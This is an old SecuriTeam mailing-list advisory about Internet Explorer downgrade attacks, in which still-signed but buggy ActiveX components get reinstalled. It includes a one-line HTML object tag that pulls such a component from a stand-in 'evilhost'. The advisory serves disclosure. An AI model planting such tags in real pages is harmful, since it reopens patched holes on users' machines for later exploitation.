[NT] Digitally Signing Buggy ActiveX Components

From: support@securiteam.com
Date: 02/15/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 15 Feb 2002 19:37:42 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Digitally Signing Buggy ActiveX Components
------------------------------------------------------------------------

SUMMARY

Back in 1999 <mailto:cuartangojc@MX3.REDESTB.ES> Juan Carlos Garcia
Cuartango made an excellent point at:
"Even if Microsoft fixes the hole, the hole will still exist forever. Why?
As far as we know this is the first time, a hole has been "SIGNED" (made
to be trusted by Microsoft). MS has released a "dhtmed.cab" file as an
ActiveX component signed by Microsoft." This means that anyone causing a
client to automatically install the package that contains a known hole
becomes immaterially vulnerable.

DETAILS

ActiveX in Internet Explorer allows downloading from the web and
installing signed components (native code) on the user computer.
 
As history shows, many ActiveX components are buggy and new version is
released. The interesting part is the buggy version is still really signed
and available in one form or another.

A pure hypothetical scenario is to try to install the old buggy signed
version if the user does not have it or on top of the patched one. This is
done this way:
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>

This will enable the attacker to now use this buggy ActiveX and exploit
the vulnerability.

ADDITIONAL INFORMATION

The information has been provided by <mailto:guninski@guninski.com>
Georgi Guninski.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.